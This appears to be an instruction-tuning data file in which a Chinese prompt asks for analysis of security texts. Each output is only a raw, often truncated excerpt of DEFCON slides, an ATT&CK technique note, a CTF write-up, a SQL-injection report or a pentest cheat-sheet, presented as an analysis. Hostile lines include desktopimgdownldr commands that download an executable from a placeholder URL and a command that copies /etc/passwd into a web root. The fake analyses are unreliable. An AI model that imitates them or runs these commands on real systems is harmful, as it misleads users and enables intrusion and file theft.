encoding=\"UTF-8\"?> <Configuration status=\"WARN\"> <Appenders> <Console name=\"Console\" target=\"SYSTEM_OUT\"> <PatternLayout pattern=\"%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n\"/> </Console> </Appenders> <Loggers> <Root level=\"error\"> <AppenderRef ref=\"Console\"/> </Ro", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1105-win-入口工具转移-desktopimgdownldr.exe(白名单) ## 来自ATT&CK的描述 攻击者可能会将工具或其他文件从外部系统转移到被攻击的环境中可以通过命令和控制通道从外部攻击者控制的系统复制文件用以将工具带入被攻击的网络中或通过其他工具如 FTP的替代协议 也可以使用 scprsync 和 sftp等本地工具在Mac和 Linux上复制文件 ## 测试案例 desktopimgdownldr.exe位于Win10的system32文件夹中原本用于设置锁定屏幕或桌面背景图像的 **路径:** ```bash - c:\\windows\\system32\\desktopimgdownldr.exe ``` 普通用户可以用以下命令来实现文件下载 ```bash set \"SYSTEMROOT=C:\\ProgramData\" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://url/xxx.exe /eventName:desktopimgdownldr ``` 管理员会多写一个注册表项所以管理员的命令如下 ```bash set \"SYSTEMROOT=C:\\ProgramData\\\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://url/file.exe /eventName:desktopimgdownldr && reg delete HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP /f ``` 用例从Web服务器下载任意文件 所需权限用户 操作系统Windows 10 ## 检测日志 windows安全日志 ## 测试复现 ```bash C:\\Users\\liyang\\Desktop\\asptest>set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr ``` ## 测试留痕 ``` 已创建新进程 创建者主题: 安全 ID: DESKTOP-PT656L6\\liyang 帐户名: liyang 帐户域: DESKTOP-PT656L6 登录 ID: 0x47126 目标主题: 安全 ID: NULL SID 帐户名: - 帐户域: - 登录 ID: 0x0 进程信息: 新进程 ID: 0x24a4 新进程名称: C:\\Windows\\System32\\desktopimgdownldr.exe 令牌提升类型: %%1938 强制性标签: Mandatory Label\\Medium Mandatory Level 创建者进程 ID: 0x2588 创建者进程名称: C:\\Windows\\System32\\cmd.exe 进程命令行: desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr ``` ## 检测方法/思路 参考Sigma官方规则: ```yml title: Suspicious Desktopimgdownldr Target File id: fc4f4817-0c53-4683-a4ee-b17a64bc1039 status: experimental description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension author: Florian Roth date: 2020/07/03 references: - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - https://twitter.com/SBousseaden/status/1278977301745741825 logsource: product: windows category: file_event tags: - a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDCFluX in: The Man with the Soldering Gun Presented By: Matt Krick, DCFluX  K3MK Chief Engineer, New West Broadcasting Systems, Inc. DEFCON 17 Las Vegas, NV Thursday July 30, 2009; 16:00  16:50 The following presentation has been edited to run in the time allotted. Hidden Agenda 1. Safety 2. Solder 3. FluX on: Flux 4. Soldering & Desoldering Tools 5. Soldering & Desoldering Demonstration 6. Editorial 1. Safety Recommended Safety Procedures  Safety Glasses or Face Shield  Non-Synthetic Clothes  Long Sleeves or Sleeve Extensions  Fume Extractor  Wash Hands After Touching Solder  Use Flexible Drinking Straws 1. Safety Dont do what DCFluX does  Low quality solder  Solder in mouth  Small soldering iron  Burnt pinky finger  Breathing fumes  Synthetic blend pants  Soldering over The Package 1. Safety Photo By: Martin Rudolph What is Solder? 2. Solder 1: a metal or metallic alloy used when melted to join metallic surfaces ; especially : an alloy of lead and tin so used http://www.merriam-webster.com/dictionary/solder  > 840F = Soldering  840 - 1200F = Brazing  1200 - 6000F = Welding 2. Solder Soldering / Brazing / Welding 2. Solder http://www.oehha.ca.gov/prop65/prop65_list/files/P65single061909.pdf  Lead  Mercury  Cadmium  Hexavalent Chromium  Polybrominated Biphenyls  Polybrominated Diphenyl Ether RoHS: Reduction of Hazardous Substances 2. Solder Regular vs. Unleaded Larcan-TTC XLS-100MU Instruction Manual Lead is a soft metal that easily rubs off. Lead is poisonous and constant exposure is known to cause brain damage. 2. Solder Regular vs. Unleaded http://www.oehha.ca.gov/prop65/prop65_list/files/P65single061909.pdf  Substances known to cause cancer in the state of California  Lead  Cadmium  Beryllium Oxide  Ethyl Alcohol (alcoholic beverages)  Marijuana Smoke  Tin Plague (Tin Pest) 2. Solder Regular vs. Unleaded Photo By: DCFluX 2. Solder Regular vs. Unleaded Photos By: NASA and Tracey Hooker  Tin Whiskers  Tin Whisker Failures 2. Solder Regular vs. Unleaded Photos By: ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Combo 300 We were given a link to the repository with potentially suspicious content: `https://github.com/HelmutVonSay/explorer`. Unfortunately, repository was removed and nowhere forked nor archived. We've noticed that related account has two another projects and one of them has 10 stargazers, regardless of the fact that it is: * a fork of another repository ([Hoaxr/DekkCrypt](https://github.com/Hoaxr/DekkCrypt), latest commit from 2016) * the only change is a single commit with added pretty laconic `README.md` file * HelmutVonSay's fork has more stargazers than original repo All stargazers joined Github on the same time as HelmutVonSay (15-16 Aug 2019). All ten accounts have pushed single repository `demo` on their accounts and starred around 50 other (mostly popular) repositories. After looking at these accounts, we've found that another jointly starred repository is [loyza0/agent](https://github.com/loyza0/agent). Repository contained few files: * `stargazer.ssh` - SSH private key which can be used for cloning loyza0's private repositories on Github * `cnc.enc` - encrypted link to secret Gist * `run.sh` which adds private key to SSH keyring, clones `loyza0/private` repo and uses `pwd.txt` file from that repo to decrypt `cnc.enc` file. After decrypting `cnc.enc` using password `amFjaGltXWhvXHhvXG9zbH4vamU`, we saw a link to [this Gist](https://gist.github.com/loyza0/9035bc975c3786952df60bf57d490285/) ``` #echo Flag #echo TMCT... #removed in this cmd cp /etc/passwd /var/www/html/p0004.html ``` Unfortunately flag was removed from that one and there was no revision containing the actual flag. We've started to look for another link in previous commits. ``` agent$ git log commit 2fdc0abda09847a28ba7c9c36e7322b8a87c57d9 (HEAD, origin/master, origin/HEAD, old, master) Author: loyza0 <54145325+loyza0@users.noreply.github.com> Date: Sat Aug 17 14:47:36 2019 -0700 new cnc commit 152ce9e6ce69bd84b666a0ec31c3b32525d0a527 Author: loyza0 <54145325+loyza0@users.noreply.github", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n5/10/2007 DEFCON 15 1 GeoLocation of Wireless Access Points & Wireless GeoCaching Presented By: Rick Hill 7/6/2007 DEFCON 15 2 The Problem: 802.11b Geo-Location  Researchers have documented at least 4 Techniques for Geo-Location of Wireless Access Points (APs)1  Netstumbler doesnt Geo-Locate > It simply gives the Drivers GPS Position.  Netstumbling & GeoCaching Compared: Wardrivers dont locate APs with the same intent that GeoCachers find Caches; theyre content to simply find New Networks. GeoCaching, in contrast, is all about Precise Location  What if we could combine the two? Consider a New Sport: Wireless GeoCaching 7/6/2007 DEFCON 15 3 Whats GeoCaching?  Wikipedia: - GeoCaching is an outdoor treasure-hunting game in which the participants use a Global Positioning System (GPS) receiver or other navigational techniques to hide and seek containers (called GeoCaches\" or \"caches\"). - Typical Cache - a small waterproof container containing a logbook & \"treasure,\" usually toys or trinkets of little monetary value. 7/6/2007 DEFCON 15 4 Project Goals  Our Goals: - Build an Automated 802.11b Tracking Device using OTS Components - Test Device in a Controlled Environment (the Lake) - Participate in Wireless GeoCaching Game: Geo-Locate hidden APs & Caches using Netstumbler and Radio Direction Finding (RDF) techniques. 7/6/2007 DEFCON 15 5 Project Concept  Of the 4 DF Methods -> - Received Signal Strength Indication (RSSI) + Angle of Arrival (AOA) + Triangulation is easiest to Implement  Our Platform: Sea Ray Boat  Location: Lake Anna, VA  Equipment: - Hardware - 15 Db YAGI Antenna, Stepping Motor & Controller, Digital Compass, GPS, Dell Laptop - Software  XP, Netstumbler 0.4.0, Visual Basic 5.0 7/6/2007 DEFCON 15 6 Agenda  Background  Why is Wireless Tracking so Hard???  4 Techniques  Advantages / Disadvantages  Building the Tracker (HW/ SW)  Static Test with a Known AP  Wireless GeoCaching  Accuracy compared to other Techniques 7/6/2007 DEFCON 15 7 Why So Difficult?  Spread", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nREVIEW OF WEB APPLICATIONS SECURITY AND INTRUSION DETECTION IN AIR TRAFFIC CONTROL SYSTEMS Federal Aviation Administration Report Number: FI-2009-049 Date Issued: May 4, 2009 Memorandum U.S. Department of Transportation Office of the Secretary of Transportation Office of Inspector General Subject: ACTION: Report on Review of Web Applications Security and Intrusion Detection in Air Traffic Control Systems Report Number: FI-2009-049 Date: May 4, 2009 From: Rebecca C. Leng Assistant Inspector General for Financial and Information Technology Audits Reply to Attn. of: JA-20 To: Acting Federal Aviation Administrator This report presents the results of our audit of Web applications security and intrusion detection in air traffic control (ATC) systems. This audit was requested by the Ranking Minority members of the House Committee on Transportation and Infrastructure and its Aviation Subcommittee. Homeland Security Presidential Directive (HSPD)7 designates air traffic control systems as part of the Nations critical infrastructure due to the important role commercial aviation plays in fostering and sustaining the national economy and ensuring citizens safety and mobility. Essentially, HSPD-7 requires the Secretary of Transportation to ensure that the ATC system is protected from both physical and cyber security threats to prevent disruptions in air travel and commerce. The need to protect ATC systems from cyber attacks requires enhanced attention because the Federal Aviation Administration (FAA) has increasingly turned toward the use of commercial software and Internet Protocol (IP)1-based technologies to modernize ATC systems. While use of commercial IP products, such as Web applications,2 has enabled FAA to efficiently collect and disseminate information to facilitate ATC services, it inevitably poses a higher security risk to ATC systems than when they were developed primarily with proprietary software. 1 Internet Protocol (IP) is a communications standard describing how ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2011 绿盟科技 www.nsfocus.com nsfocus.com www.nsfocus.com nsfocus.com 如何打造一款内网穿梭的利器 安全服务部 ---- 曲文集 引子 引子 它在这里 http://www.rootkiter.com/EarthWorm 引子 它的功能有 a) 端口转发可团队协同 b) 多平台支持 c) 和本地测试工具联动 d) 便携式 http://www.rootkiter.com/EarthWorm 引子 它的功能有 a) 端口转发可团队协同 b) 多平台支持 c) 和本地测试工具联动 d) 便携式 http://www.rootkiter.com/EarthWorm 议题主线 WHY And HOW 1 内网中的那些坑 3 一些思考 2 如何填坑 目录 内网中的那些坑 1网络复杂 (LAN->WAN) 有一种坑叫做你已经在内网中我却在内网的子网中 日日见君君却不识我 路由器 192.168.xx.xx 墙 10.xx.xx.xx 内网中的那些坑 1网络复杂 (WAN->LAN) 另一种坑叫做你天天来找我玩我却还不知道你家在哪 你娘让我喊你回家吃饭噻但问题是你在哪呢 路由器 192.168.xx.xx 墙 10.xx.xx.xx 内网中的那些坑 2主机复杂外表 这叫做 林子大了什么鸟都有 内网中的那些坑 2主机复杂内在 这叫做 林子大了什么鸟都有Too 内网中的那些坑 3内网带宽有限远程桌面嵌套起来会很卡 内网中的那些坑 1. 端口转发正向反向自由切换 2. 支持常见的操作系统和处理器 3. 自身要够小且无需额外的环境依赖 4. 可以直接和测试机工具联动 网速限制传工具很费事 3 一些思考 1 内网中的那些坑 目录 2 如何填坑 如何填坑 1. 端口转发正向反向自由切换 A 正向端口转发很简单有新连接就新建连接即可时序图如下 如何填坑 1. 端口转发正向反向自由切换 B 反向的端口转发就需要控制下游节点新建用于数据交互的隧道 如何填坑 2. 支持常见的操作系统和处理器 运行环境 特殊设备 OpenWrtTPLink 如何填坑 2. 支持常见的操作系统和处理器 可以生成原生代码 且都是跨平台库 成品会依赖很多dll文件 在一些嵌入式设备下 支持不够完美 如何填坑 2. 支持常见的操作系统和处理器 可以生成原生代码 且都是跨平台库 成品会依赖很多dll文件 在一些嵌入式设备下 支持不够完美 如何填坑 2. 支持常见的操作系统和处理器 如何填坑 3. 自身要够小且无需额外的环境依赖 如何填坑 4. 可以直接和测试机工具联动 从网络逻辑上进入目标网段 A. VPN 实现上存在一定难度 B. 利用代理服务来达到这一效果 如何填坑 4. 可以直接和测试机工具联动 常见的代理协议 HTTP SSL FTP SOCKS 如何填坑 4. 可以直接和测试机工具联动 常见的代理协议 HTTP SSL FTP SOCKS 这里有一篇协议细则 http://www.rfc-editor.org/rfc/rfc1928.txt 高效体系完善周边工具多 有协议实现的样例代码 如何填坑 还有哪些要注意的 A. 等价 API 抽象层 不同平台的 API 提供有差异 B. 编译环境搭建 Linux : $ sudo apt-get install gcc MacOS: Xcode 装好就有对应的 gcc 了 Windows MINGW32 + gcc 其他嵌入式设备 Linux + buildrootToolchain C. Big/Little -Endian 由于 CPU 存在差异化而选定的实现语言为 C 所以编码时要注意规避这类问题 2 如何填坑 1 内网中的那些坑 目录 3 一些思考 一些思考 1. 多平台原生层恶意程序可行 2. 重视内网安全 3. 小心身边的智能设备 谢谢", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbusing Bleeding Edge Web Standards for AppSec Glory Bryant Zadegan Ryan Lester Advisor/Mentor CEO, Co-Founder Mach37 Cyph keybase.io/bryant hacker@linux.com @eganist @TheRyanLester  Does AppSec stuff, usually.  Mentors security startups, sometimes.  Mentors others on AppSec, occasionally.  Paid a buck to make Steve Ballmer dance, but just once.  Runs an E2EE communication startup  Codes for an E2EE communication startup  Ran QA automation at a rocket factory  Got sued by Napster (and not for piracy) Bleeding Edge Web Standards  For Your (Ab)use (FOSS + Demo) (Demo) (Demo) Potential Pain: But Why? Source: Harold & Kumar Go to White Castle  New standards are frequently drafted.  Many introduce unforeseen complications.  Novel uses encourage future tweaks. S R I  Validate resources beyond your trust (e.g. CDNs) <script src=\"https://code.jquery.com/jquery.min.js\" integrity=\"sha256-[hash] sha256-[hash2]\" crossorigin=\"anonymous\"> </script>  w3.org/TR/SRI/  caniuse.com/subresource-integrity BUILDER DEMO heisenberg.co/sridemo/ Praise be to the demo gods heisenberg.co/sridemo/sameorigin (  ʖ ) SRI Per the SRI Spec: ...so we implemented it for you. NOTE On a failed integrity check, an error event is fired. Developers wishing to provide a canonical fallback resource (e.g., a resource not served from a CDN, perhaps from a secondary, trusted, but slower source) can catch this error event and provide an appropriate handler to replace the failed resource with a different one. BUILDER DEMO heisenberg.co/srifallbackdemo/ Kneel to the demo gods SOURCE (Simplified BSD) github.com/cyph/sri-fallback Do source gods even exist? CSP  Combines semi-strict header with strict meta.  Allows for pre-loading of trusted complex logic.  Does not work for the verbs frame- ancestors, report-uri, or sandbox. (We didnt actually trademark this, but its a good name.) BUILDER DEMO heisenberg.co/metacspdemo/ Fall on thy sword for the demo gods. CSP  Best for adapting a semi-recent application for use wit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport matplotlib.pyplot as plt from copy import * datafiles = ['RSPI_GPIO_7.txt','RSPI_GPIO_8.txt','RSPI_GPIO_18.txt','RSPI_GPIO_23.txt','RSPI_GPIO_24.txt','RSPI_GPIO_25.txt'] labels = ['RS','CLK','BIT7','BIT6','BIT5','BIT4'] data=[] class Point: def __init__(self,x,y,l): self.x=x self.y=y self.l=l def __repr__(self): return '('+str(self.x)+' ; '+str(self.y)+' ; '+str(self.l)+')' class State: def __init__(self,rs,clk,bit4,bit5,bit6,bit7): self.rs=rs self.clk=clk self.bit4=bit4 self.bit5=bit5 self.bit6=bit6 self.bit7=bit7 def __repr__(self): return str(self.rs)+'\\t'+str(self.clk)+'\\t'+str(self.bit4)+'\\t'+str(self.bit5)+'\\t'+str(self.bit6)+'\\t'+str(self.bit7) for n,i in enumerate(datafiles): with open(i) as f: datax=map(float,f.readline().split()) datay=map(float,f.readline().split()) for ii in range(len(datax)): data.append(Point(datax[ii],datay[ii],labels[n])) data.sort(key=lambda s: s.x) states=[] st = State(0,1,0,0,0,0) for i in data: if i.l=='RS': st.rs=i.y elif i.l=='CLK': if i.y==0 and st.clk==1: st.clk=i.y #if st.rs==0: states.append(copy(st)) else: st.clk=i.y elif i.l=='BIT4': st.bit4=i.y elif i.l=='BIT5': st.bit5=i.y elif i.l=='BIT6': st.bit6=i.y elif i.l=='BIT7': st.bit7=i.y else: states.append('\\033[1;34m\\]ERROR '+str(i.l)+'\\033[0m\\]') #print '!!!JUST FOR WATCHING TO DECODE UGLY PRINT DATA!!!\\n\\n' #print 'no\\trs\\tclk\\tbit4\\tbit5\\tbit6\\tbit6' #for i in range(1,len(states)): # print i,'\\t',states[i] ###UGLY PRINTING### for decoding for i in range(1,len(states)): print states[i]", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2 3 4 5 6 7 8 9 10 11 12 13 14 15 21317 subdomain 11928 unique IP 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 66 67 68 69 70 75 76 77 78 79 80 82 84 85 91 93 96 97 98 99 100 104 109 113 114", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRevolutionizing the Field of Grey-box Attack Surface Testing with Evolutionary Fuzzing Jared DeMott Dr. Richard Enbody @msu.edu Dr. William Punch DEFCON 2007 VDA Labs, LLC www.vdalabs.com Agenda Goals and previous works (1) Background Software, fuzzing, and evolutionary testing (2) Describe EFS in detail GPF && PaiMei && development++ == EFS (3) Initial benchmarking results (4) Initial results on a real world application Conclusion and future works Goals and Previous Works Research is focused on building a better fuzzer EFS is a new breed of fuzzer No definitive proof (yet) that its better than current approaches Need to compare to Full RFC type, GPF, Autodafe, Sulley, etc As of 6/21/07 there are no (available) other fuzzers that learn the protocol via a grey-box evolutionary approach Embleton, Sparks, and Cunninghams Sidewinder research Code has not been released Hoglund claims to have recreated something like Sidewinder, but also didnt release details Autodafe and Sulley are grey-box but require a capture (like GPF), or definition file (like Spike), respectively, and do not evolve Section 1: Background Software Testing Fuzz Testing Read Sutton/Greene/Amini And than read DeMott/Takanen Evolutionary Testing Software Testing Software testing can be Difficult, tedious, and labor intensive Cannot prove anything other than existence of bugs Poorly integrated into the development process Abused and/or misunderstood Has a stigma as being, easier than engineering Software testing is expensive and time-consuming About 50% of initial development costs However, primary method for gaining confidence in the correctness of software (pre-release) Done right, does increase usability, reliability, and security Example, Microsofts new security push: SDL In Short, testing is a (NP) hard problem New methods to better test software are important and in constant research Fuzzing, Testing, QC, and QA How does fuzzing fit into the development life cycle? Formal Methods of Development Qual", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlockFighting with a HOOKER Shane.Macaulay@IOACTIVE.com BLOCKFIGHTER II (@DEFCON24 #w00w00 #Blah!) (K2) ktwo@ktwo.ca What are we doing here?  Methodology & tools for high speed comprehension binary trace/analysis/steering  Super simple to use and FUN!  Monitor and Alter execution  BlockFighters  ROP DEFENDER  RAN$OM E$CROW  I HAVE A CERTAIN SET OF SKILLS  EhWinAFL  Almost defiantly not the best backend ever ;(  Hyepervisor DoS / detection!  Execution Graph tools  Block views Also + disassembly FLAME GRAPH! Intro/Outline  Hooking/Tracing  Trace: What is executing?  Hooker: Can we also modify/detour flow?  Frustrations/Hurdles  What worked, what didnt work, what also works ;)  Friendly inputs  Symbol support  Evil inputs Intro: Current & OTHER / TOOLs / CODE  https://Github.com/K2  Github.com/ShaneK2/inVtero.net  Evolution from CSW14 (process detection)  Cross platform (Windows, *BSD, Linux) memory analysis  Cross microarchitechture (sandy bridge, sky lake, ) 0  Cross hypervisor (based on auto-magic VMCS / EPTP extraction)  Includes nested support (D33P introspection)  EhTrace (pronounced A Trace)  What were going to cover this time DEFCON24!!! <<<==============  Let me know if I missed any code in the check-in!! PRE-ALPHA!!!#(%@ check in is cowboy coding / lazy / uhhh  Goals  Trace or Modify execution  Bare metal  Can run under a hypervisor  Binary steering  This method (EhTrace) does not require multiple executions  Using profiling hardware supported logging is faster at run time yet slower in some cases due to requiring us to re-run our target  EhTrace in a DBI  for fuzzing?  Maybe in the cloud or malicious binaries  Benign binaries check out Richard Johnsons work Go Speed Tracer  Lets see what AFL does in any event (hohooooo) Dreams  Fun sandbox that is flexible and easy to play with  Lots of blockfighters  Swiss Army stuff  Defend against mal-code  Attack to understand anything  Uber perf  Slicing is your friend  Kernel look Dependencies  I use Windows 10 x64  Cl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# MSSQL Server ## Summary * [Tools](#tools) * [Identify Instances and Databases](#identifiy-instaces-and-databases) * [Discover Local SQL Server Instances](#discover-local-sql-server-instances) * [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances) * [Discover Remote SQL Server Instances](#discover-remote-sql-instances) * [Identify Encrypted databases](#identifiy-encrypted-databases) * [Version Query](#version-query) * [Identify Sensitive Information](#identify-sensitive-information) * [Get Tables from a Specific Database](#get-tables-from-specific-databases) * [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column) * [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) * [Dump common information from server to files](#dump-common-information-from-server-to-files) * [Linked Database](#linked-database) * [Find Trusted Link](#find-trusted-link) * [Execute Query Through The Link](#execute-query-through-the-link) * [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) * [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) * [Query Version of Linked Database](#query-version-of-linked-database) * [Execute Procedure on Linked Database](#execute-procedure-on-linked-database) * [Determine Names of Linked Databases ](#determine-names-of-linked-databases) * [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) * [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) * [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) * [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) * [Extended Stored Procedure](#extended-stored-procedure) * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-proc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n优酷主站一处 SQL 注入 注该文档仅Web 安全小蜜圈交流之用漏洞已经修复请勿外传如出现 法律问题外传该文档者自行承担法律责任 在测试上个 XSS 的时候无意跑的注入点在配色的这个请求包上 然后确定的时候用 burpsuite 抓包给 color_page_back 参数后面加了个双引号就爆了 了 mysql 的错 然后给后面加个*扔进 sqlmap 就跑出来啦~ 为了证明危害我这里还跑出来了数据库名", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n30-Jun-08 Defcon16 2008 1 Open Source Warfare Origins Use Transformations Day Three: Sunday, August 10 10:30 am Track 3 30-Jun-08 Defcon16 2008 2 Oh my. What is Asymmetric Warfare Is it purely defensive Does it rely on traditional concepts How does an established fighting group use it Does it overlap with other computer security issues Gosh. What is Open Source Warfare Who uses it Who is it used against Are there any defenses Is it successful Where is it used 30-Jun-08 Defcon16 2008 3 Warnings A few things to remember:  Although this stuff in very interesting it is used primarily in warfare.that means people actually die  If you think youre smart enough to try this on your own you are wrong! and you could go to jail.  Because of all this we will keep the examples simple, well known and generic  Importantly, this is a value neutral technical presentation: that means that well only look at techniques and not evaluate whether the people using these methods are right or wrong, justified or unjustified 30-Jun-08 Defcon16 2008 4 What types of things are used in OSW  In a funny way this is a lot like McGyver  Almost anything can be usedtoothpicks, tin foil, matchbooks, string..  But on the contemporary battlefield it depends more heavily on things like mobile phones, microwave ovens, remote controlled aircraft, toy robots, digital cameras, sniffer tools 30-Jun-08 Defcon16 2008 5 Lets look at telecommunications  Lebanon is a good example  You may remember a few months ago that there was tremendous upset when the government attempted to quash third-party telecommunications networks  In fact, it led to major fighting in the street  To complicate matters the country also faces a number of external forces, Syria, Iran, Israel  As well as a number of internal forces 30-Jun-08 Defcon16 2008 6 Lets look at telecommunications  So what was the problem  Third party groups had co-opted the telecom network set up by the government  This was accomplished by extending copper networks  Cr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 介绍 > 译者[@Snowming](https://github.com/Snowming04) ![](../images/introduction/cat.PNG) 在本书的上一版本The Hacker Playbook 2中你的任务是渗透 SUCK 公司的武器设备库然而他们现在又建立了新的部门称之为 Cyber Space Kittens CSK这个新部门吸取了之前安全评估的所有经验教训加强了他们的系统建立了本地安全操作中心甚至还创建了安全策略所以他们再次聘用你作为渗透人员来测试一下他们所做的所有安全限制是否有助于公司的整体防御 我们能够收集到的关于此部门的信息很少从有限的信息收集结果来看我们发现CSK 部门似乎发现了一颗秘密的行星位于仙女座大星云或仙女座星系这颗行星坐落于于两个旋臂中的一个被称为 KITT-3n它的大小是地球的两倍位于一个被叫做 OI 31337 的双星系统中而另一颗星星的大小也是地球的两倍看起来这可以创造一个可能很适合居住的环境有海洋有湖泊有植物甚至可能有生命... 伴随着对新生命和另一个可居住星球的向往太空竞赛也成为事实了CSK 已经聘用我们作为红队进行安全评估确保他们在网络世界的安全并且能够检测和及时的阻止外在的破坏行为他们的老板已经知道了去年所有的重大安全攻击行为所以他现在只想聘用最好的员工这个公司是你要开展工作的地方... 如果你选择接受这个任务那你就必须找到所有的内部和外部的漏洞并且用最新的 exp 和组合漏洞去看看他们的防御团队是否能够发现或阻止你 你要决定用什么类型的 TTP战术策略威胁情报和恶意程序去进行你的工作呢在这场战斗中你前期需要做大量的信息收集工作去观察寻找他们外部基础设施的薄弱点社工他们公司的员工提升你的权限获取内部网络的信息在整个内网中进行漫游并且能够最终窃取有关 KITT-3n 行星的系统和数据库的信息 ## 渗透测试团队与红队 在我们深入了解红队背后的技术理念之前我需要说明一下我对**渗透测试**和**红队**的理解这两个词语经常被一起讨论所以可能会让人感觉到有些混淆在这本书里我会谈一下我是如何理解渗透测试团队和红队这两个不同的术语的 渗透测试团队更多的是对网络应用程序以及硬件等方面进行严格的全方位的测试如果你之前没接触过渗透测试我建议你先阅读一下[渗透测试执行标准 PTES](http://www.pentest-standard.org)这是一个关于如何进行渗透评估的非常好的指导手册简而言之你会经历确定渗透测试范围然后对其进行详细的信息收集下一步的漏洞挖掘漏洞利用以及后渗透阶段和最终的完成渗透测试报告等所有工作在传统的网络测试中我们经常会用扫描器扫描漏洞去寻找可利用的漏洞点和应用或者系统可能会稍微的再进行一点深入的工作去找到域管理员最后写一份报告这种类型的测试创造了一个漏洞挖掘漏洞修补以及可控性的测试方法的整体模型即使是在确定范围期间内渗透测试也非常明确首先测试评估期间是在一周或两周内其次通常会向公司内部的安全团队进行结果公布因为公司仍然需要渗透测试人员作为其安全软件开发周期(S-SDLC)不可或缺的组成部分 现在即使很多公司遵循安全软件开发生命周期拥有漏洞防护程序渗透测试人员应急响应团队或应急程序并且可能还有很多昂贵的安全防火墙但他们仍然会有被入侵的威胁如果我们看看最近爆出来的任何一个[漏洞](https://informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks)我们会发现有很多大公司都会中招而且我们可以在一些安全报告中看到一些在六个月以前就被入侵的[案例](https://en.wikipedia.org/wiki/Sony_Pictures_hack)下面这份[报告](https://www.esecurityplanet.com/network-security/almost-a-third-of-all-u.s.-businesses-were-breached-in-2017.html)指出2017年几乎三分之一的业务遭到了攻击破坏我想问问所有的公司如果你们公司遭遇了同样的攻击你能检测到吗会用多长时间发现被入侵以后你可以从攻击中恢复吗你能准确的知道入侵者对你的公司做了什么吗 这就是红队存在的意义红队的任务就是模仿入侵者的TTP战术和技术手段红队的目标是测出公司应对入侵事件的真实状况找到安全计划中的问题和员工对安全项目的理解中的不足最终提高他们对安全计划的理解 对于红队来说它不像渗透测试那样有条不紊因为我们是在模拟现实的入侵事件所以每个测试过程都会有很大的差异比如一些测试项目可能侧重于窃取员工个人的身份信息(PII) 或者信用卡而有的测试项目可能侧重于", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndirname === 去除文件名中的非目录部分 ## 补充说明 **dirname命令** 去除文件名中的非目录部分仅显示与目录有关的内容dirname命令读取指定路径名保留最后一个`/`及其后面的字符删除其他部分并写结果到标准输出如果最后一个`/`后无字符dirname 命令使用倒数第二个`/`并忽略其后的所有字符dirname 和 basename 通常在 shell 内部命令替换使用以指定一个与指定输入文件名略有差异的输出文件名 ### 语法 ```shell dirname(选项)(参数) ``` ### 选项 ```shell --help显示帮助 --version显示版本号 ``` ### 实例 ```shell dirname // 结果为 / dirname /a/b/ 结果为/a dirname a 结果为 . dirname a/b 结果为路径名 a ```", "category": "text_analysis", "source": "security_papers"}
